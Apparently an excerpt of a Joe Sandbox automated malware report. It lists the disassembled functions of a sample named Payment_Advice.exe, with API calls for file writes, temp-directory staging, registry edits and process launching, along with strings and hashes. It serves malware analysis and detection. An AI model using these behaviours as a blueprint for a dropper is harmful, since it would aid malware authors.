Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 0040317B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNELBASE(0040BE78,00410BAF,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNELBASE(00137242,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

&, xrefs: 004031DA
habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004031F0, 004031F6

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek$&
API String ID: 2146148272-413442094
Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment_Advice.exe"), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas,?,00000000,000000F0), ref: 00401630

Strings

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas
API String ID: 3751793516-2435848561
Opcode ID: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

Function 0040638E Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00406398

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 0-2559241417
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
WriteFile.KERNELBASE(00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,?,000000FF,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004030DC, 004030F3, 0040310F

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: File$PointerWrite
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 539440098-2559241417
Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00405B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC

Strings

nsa, xrefs: 00405B90
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B88, 00405B8C

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 0040232F Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

Function 00403324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00403345

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403325, 0040332A, 00403330, 0040333C, 00403344, 0040334B
1033, xrefs: 0040334C

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
